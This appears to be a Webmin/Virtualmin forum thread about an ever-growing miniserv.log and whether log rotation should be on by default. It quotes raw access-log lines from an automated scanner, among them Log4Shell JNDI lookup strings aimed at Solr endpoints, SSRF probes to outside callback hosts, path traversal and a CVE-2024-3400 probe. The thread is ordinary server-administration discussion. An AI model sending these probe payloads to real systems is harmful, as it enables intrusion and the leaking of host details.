Miniserv webserver log growing too big - should be rotated

Please excuse me for resurrecting a post from ~2 years ago.

Because today I’ve noticed the webmin miniserv.log file has grown considerably large during the life time of some of my servers.

Our friend @Stegan suggested “solving the underlying issue”, without further details.
But I want to argue that this log file should be treated in the same way any apache log file would; which is periodic rotation.

miniserv.log is indeed a webserver’s log file, and in a Virtualmin installation, this web server is naturally publicly visible.
Eventually automated attacks bound to happen every while and then, and this log file will just keep on growing indefinitely.
So even if we have a WAF or some other sort of protection, we cannot predict that this file’s size will remain in the tame zone over years of server operation.

Hence I’m renewing @suther’s request/wish that /var/webmin/miniserv.log and /var/webmin/miniserv.error should get included in the rotation configuration out-of-the-box.

Or am I mistaking? Is there a better way to handle this?

What exactly is being logged though? It shouldn’t grow that much and that fast!

Nevertheless, the Miniserv log rotation is configured in “Webmin ⇾ Webmin Configuration: Logging” page using “Periodically clear log files” option.

Here are two samples from miniserv.log:

2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:21:58:23 +0000] "GET /xhr.cgi?xhr-info=1 HTTP/1.1" 200 27336
2a01:7f8:4000:1e3d::1 - - [06/Feb/2026:22:00:04 +0000] "POST /session_login.cgi HTTP/1.1" 401 123749
2a01:4f8:0:a101::6:2 - - [06/Feb/2026:22:00:41 +0000] "GET / HTTP/1.1" 401 123485
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:02:39 +0000] "GET /xhr.cgi?type=nav&action=get&subtype=webmin HTTP/1.1" 200 13605
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:02:54 +0000] "POST /sysinfo.cgi HTTP/1.1" 200 32669
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:02:55 +0000] "GET /stats.cgi HTTP/1.1" 200 172
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:02:55 +0000] "GET /authentic-theme/ws-555 HTTP/1.1" 101 0
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:03:01 +0000] "GET /xhr.cgi?xhr-info=1 HTTP/1.1" 200 27335
2a01:4f8:0:a101::6:1 - - [06/Feb/2026:22:06:18 +0000] "GET / HTTP/1.1" 401 123485
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:10:01 +0000] "GET /xhr.cgi?xhr-info=1 HTTP/1.1" 200 27336
2a01:4f8:0:a101::6:1 - - [06/Feb/2026:22:12:24 +0000] "GET / HTTP/1.1" 401 123485
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:17:02 +0000] "GET /xhr.cgi?xhr-info=1 HTTP/1.1" 200 27336
2a01:4f8:0:a101::6:2 - - [06/Feb/2026:22:17:48 +0000] "GET / HTTP/1.1" 401 123485
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:23:19 +0000] "GET /logrotate/save_log.cgi HTTP/1.1" 200 2845
2a01:4f8:0:a101::6:2 - - [06/Feb/2026:22:23:27 +0000] "GET / HTTP/1.1" 401 123485
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:23:37 +0000] "GET /logrotate/edit_log.cgi?idx=15 HTTP/1.1" 200 24214
2a01:7f8:4000:1e3d::1 - johnny [06/Feb/2026:22:24:02 +0000] "GET /xhr.cgi?xhr-info=1 HTTP/1.1" 200 27336
2a01:4f8:0:a101::6:2 - - [06/Feb/2026:22:28:45 +0000] "GET / HTTP/1.1" 401 123485
2a01:7f8:4000:1e3d::1 - - [06/Feb/2026:22:29:51 +0000] "GET /session_login.cgi?logout=1 HTTP/1.1" 401 123747
2a01:4f8:0:a101::6:2 - - [06/Feb/2026:22:35:07 +0000] "GET / HTTP/1.1" 401 123485
2a01:4f8:0:a101::6:3 - - [06/Feb/2026:22:41:59 +0000] "GET / HTTP/1.1" 401 123485
2a01:4f8:0:a101::6:3 - - [06/Feb/2026:22:47:11 +0000] "GET / HTTP/1.1" 401 123485
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "" 302 0
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "POST / HTTP/1.1" 302 0
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "POST /_next HTTP/1.1" 302 0
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "POST /api HTTP/1.1" 302 0
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "POST /_next/server HTTP/1.1" 302 0
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "POST /app HTTP/1.1" 302 0
146.19.24.133 - - [06/Feb/2026:22:48:09 +0000] "POST /api/route HTTP/1.1" 302 0

216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "GET /pictureproxy.php?url=http://d63567nfive0sraq6890k6f518ht1roce.ish-asi.securitytrails.com HTTP/1.1
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "GET /qvisdvr/ HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "GET /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "POST /boardDataWW.php HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "GET /cdn-cgi/image/width/https://d63567nfive0sraq6890hnt466moagzj1.ish-asi.securitytrails.com HTTP/1.1
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "POST /connect/register HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "GET / HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:51 +0000] "POST /php/query.php HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /ssl-vpn/hipreport.esp HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /api/push HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "GET / HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "GET /_next/image?w=16&q=10&url=https://d63567nfive0sraq6890dq6zypnesiuzk.ish-asi.securitytrails.com HT
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "GET https://test.s3.amazonaws.com HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-752%7D%24%7B%3A-551%7D.%24%7Bho
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "GET /webtools/control/main HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /solr/gettingstarted_shard1_replica_n1/config HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST / HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "GET /solr/admin/cores?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-752%7D%24%7B%3A-551%7D.%24%7BhostName
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HT
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /suite-auth/login HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /commpilot/servlet/Login HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:52 +0000] "POST /ccmadmin/j_security_check HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "GET /model-versions/get-artifact?path=random&name=PTBzyJ&version=2 HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "POST /j_security_check HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-189}${:-466}.${hostName}.username.d63567n
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "POST /orion/login?siteurl=meet HTTP/1.1" 401 122719
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "GET /rest/sharelinks/1.0/link?url=https://d63567nfive0sraq6890y9oxdagn9g63y.ish-asi.securitytrails.com
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "GET /global-protect/portal/images/CVE-2024-3400.txt HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:53 +0000] "GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureComma
216.25.125.1 - - [06/Feb/2026:20:46:54 +0000] "POST /runners/start HTTP/1.1" 401 123497
216.25.125.1 - - [06/Feb/2026:20:46:54 +0000] "POST / HTTP/1.1" 401 123497

Thank you for the tip. I just noticed this option, but my concern now is with the word “clear”, which means the log is effectively zeroed every x hours. Right? I guess this could be an issue if an admin would want to study the log from earlier periods..

If you want Webmin logs to be saved when rotated, you can disable log clearing on the “Webmin Configuration → Logging” page and use the “System → Log File Rotation” module instead.

Thank you, Ilia!
I still wonder what are your thoughts on having such setting (rotation) enabled by default with new installations.

When a system running Webmin/Virtualmin is publicly exposed, the potential for an infinitely growing log is a potential for a DoS attack by filling up the storage.

Or am I exaggerating?

It really depends on the system and the amount of traffic, so it should be handled on a case-by-case basis, I think. Also, setting up log rotation for Miniserv logs is simple.

We should probably default to sending miniserv.error to STDERR for consumption by the journal on systemd systems. Free rotation, and the unit name is the natural place to look for problems with a service. Also gives users free ingestion of that log into tools like Loki or ELK Stack, Fluentd or Graylog, assuming they’re already ingesting the journal.

For miniserv.access and the Webmin actions log, we probably ought to ship a reasonable logrotated config file in the RPM and deb. It won’t do anything if logrotate isn’t installed/enabled, and it’s more graceful than just deleting the logs periodically.

Thanks, Joe! I like your suggestion!

@Jamie, what are your thoughts on this? Do you think we should implement it?

This mirrors what other web servers usually do in the default package. e.g. Apache gets server errors into the journal, and web access_log/error_log goes to files.

Yes, that seems pretty reasonable to me

This topic was automatically closed 8 days after the last reply. New replies are no longer allowed.